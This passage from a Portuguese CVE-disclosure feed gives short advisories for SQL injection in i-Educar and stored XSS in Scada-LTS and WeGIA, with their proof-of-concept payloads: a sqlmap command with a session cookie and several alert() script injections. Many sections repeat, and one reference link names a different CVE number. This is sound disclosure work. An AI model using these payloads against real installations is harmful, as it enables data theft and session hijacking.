</h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>RegraAvaliacao/view?id=[id]</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-9532-vulnerabilidade-de-injeção-sql-boolean-based-no-parâmetro-id-do-endpoint-regraavaliacaoviewidid">CVE-2025-9532: Vulnerabilidade de Injeção SQL (Boolean-Based) no parâmetro <code>id</code> do Endpoint <code>RegraAvaliacao/view?id=[id]</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9532" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9532</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>id</code> do endpoint <code>RegraAvaliacao/view?id=[id]</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro <code>id</code>. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>RegraAvaliacao/view?id=[id]</code></p> <p>Parâmetro: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sqlmap -u "http://localhost:8086/module/RegraAvaliacao/view?id=1" -p id --cookie="i_educar_session=qEk2wbjxS5IbECJGqnIa0dbmIyI3XIsXqm3WSh6K" \ --dbms=PostgreSQL --technique=B --dbs --batch </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9532/image.png" width="643" height="181" srcset="/p/cve-2025-9532/image_hu_916de85146360227.png 480w, /p/cve-2025-9532/image_hu_f7d5ec59efe01a20.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="355" data-flex-basis="852px" /></p> <p><img src="/p/cve-2025-9532/image-1.png" width="435" height="330" srcset="/p/cve-2025-9532/image-1_hu_a62c4634acc8c2b6.png 480w, /p/cve-2025-9532/image-1_hu_5b7f6002eccfaf96.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="131" data-flex-basis="316px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9652.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 27 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9388/ https://www.cvehunters.com/pt/p/cve-2025-9388/ <h2 id="cve-2025-9388-cross-site-scripting-xss-armazenado-no-endpoint-watch_listshtm-parâmetro-name">CVE-2025-9388: Cross-Site Scripting (XSS) Armazenado no endpoint <code>watch_list.shtm</code> parâmetro <code>name</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9388" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9388</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>watch_list.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>name</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>watch_list.shtm</code></p><h2 id="cve-2025-9388-cross-site-scripting-xss-armazenado-no-endpoint-watch_listshtm-parâmetro-name">CVE-2025-9388: Cross-Site Scripting (XSS) Armazenado no endpoint <code>watch_list.shtm</code> parâmetro <code>name</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9388" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9388</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>watch_list.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>name</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>watch_list.shtm</code></p> <p>Parâmetro: <code>name</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>name</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert("Watchlist")</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9388/image.png" width="819" height="421" srcset="/p/cve-2025-9388/image_hu_c2cefdeb719d4d72.png 480w, /p/cve-2025-9388/image_hu_50dc5afcdb9bf712.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="194" data-flex-basis="466px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9388.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9388.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 24 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-57762/ https://www.cvehunters.com/pt/p/cve-2025-57762/ <h2 id="cve-2025-57762-cross-site-scripting-xss-armazenado-no-endpoint-dependente_docdependentephp-parâmetro-name">CVE-2025-57762: Cross-Site Scripting (XSS) Armazenado no endpoint <code>dependente_docdependente.php</code> parâmetro <code>name</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-57762" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-57762</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>dependente_docdependente.php</code> do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>name</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>dependente_docdependente.php</code></p><h2 id="cve-2025-57762-cross-site-scripting-xss-armazenado-no-endpoint-dependente_docdependentephp-parâmetro-name">CVE-2025-57762: Cross-Site Scripting (XSS) Armazenado no endpoint <code>dependente_docdependente.php</code> parâmetro <code>name</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-57762" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-57762</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>dependente_docdependente.php</code> do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>name</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>dependente_docdependente.php</code></p> <p>Parâmetro: <code>name</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>name</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-57762/image.png" width="1273" height="849" srcset="/p/cve-2025-57762/image_hu_79c930746da3382f.png 480w, /p/cve-2025-57762/image_hu_dca868afd0ec9e1d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="149" data-flex-basis="359px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-494r-43f3-p828" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-494r-43f3-p828</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Thu, 21 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9233/ https://www.cvehunters.com/pt/p/cve-2025-9233/ <h2 id="cve-2025-9233-cross-site-scripting-xss-armazenado-no-endpoint-view_editshtm-parâmetro-name">CVE-2025-9233: Cross-Site Scripting (XSS) Armazenado no endpoint <code>view_edit.shtm</code> parâmetro <code>name</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9233" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9233</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>view_edit.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>name</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>view_edit.shtm</code></p><h2 id="cve-2025-9233-cross-site-scripting-xss-armazenado-no-endpoint-view_editshtm-parâmetro-name">CVE-2025-9233: Cross-Site Scripting (XSS) Armazenado no endpoint <code>view_edit.shtm</code> parâmetro <code>name</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9233" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9233</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>view_edit.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>name</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>view_edit.shtm</code></p> <p>Parâmetro: <code>name</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>name</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert("View1")</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9233/image.png" width="917" height="424" srcset="/p/cve-2025-9233/image_hu_5fdba5b40e1e1605.png 480w, /p/cve-2025-9233/image_hu_77b76c01a046725a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="216" data-flex-basis="519px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9233.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9233.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 20 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9234/ https://www.cvehunters.com/pt/p/cve-2025-9234/ <h2 id="cve-2025-9234-cross-site-scripting-xss-armazenado-no-endpoint-maintenance_eventsshtm-parâmetro-alias">CVE-2025-9234: Cross-Site Scripting (XSS) Armazenado no endpoint <code>maintenance_events.shtm</code> parâmetro <code>alias</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9234" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9234</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>maintenance_events.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>alias</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>maintenance_events.shtm</code></p><h2 id="cve-2025-9234-cross-site-scripting-xss-armazenado-no-endpoint-maintenance_eventsshtm-parâmetro-alias">CVE-2025-9234: Cross-Site Scripting (XSS) Armazenado no endpoint <code>maintenance_events.shtm</code> parâmetro <code>alias</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9234" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9234</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>maintenance_events.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>alias</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>maintenance_events.shtm</code></p> <p>Parâmetro: <code>alias</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>alias</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert("Maintenance")</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9234/image.png" width="865" height="422" srcset="/p/cve-2025-9234/image_hu_2229e4ca9efcb897.png 480w, /p/cve-2025-9234/image_hu_92833fb3a512e8e0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="204" data-flex-basis="491px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9234.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9234.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 20 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9235/ https://www.cvehunters.com/pt/p/cve-2025-9235/ <h2 id="cve-2025-9235-cross-site-scripting-xss-armazenado-no-endpoint-compound_eventsshtm-parâmetro-name">CVE-2025-9235: Cross-Site Scripting (XSS) Armazenado no endpoint <code>compound_events.shtm</code> parâmetro <code>name</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9235" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9235</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>compound_events.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>name</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>compound_events.shtm</code></p><h2 id="cve-2025-9235-cross-site-scripting-xss-armazenado-no-endpoint-compound_eventsshtm-parâmetro-name">CVE-2025-9235: Cross-Site Scripting (XSS) Armazenado no endpoint <code>compound_events.shtm</code> parâmetro <code>name</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9235" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9235</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>compound_events.shtm</code> do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>name</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>compound_events.shtm</code></p> <p>Parâmetro: <code>name</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>name</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('Compound-PoC-XSS')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9235/image.png" width="823" height="475" srcset="/p/cve-2025-9235/image_hu_5f30348700829446.png 480w, /p/cve-2025-9235/image_hu_ef6aa04245283b7a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="173" data-flex-basis="415px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9235.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-9235.md</a></strong></em></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 20 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-9236/ https://www.cvehunters.com/pt/p/cve-2025-9236/ <h2 id="cve-2025-9236-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-nm_tipo-do-endpoint-educar_tipo_usuario_lstphp">CVE-2025-9236: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>nm_tipo</code> do Endpoint <code>educar_tipo_usuario_lst.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" 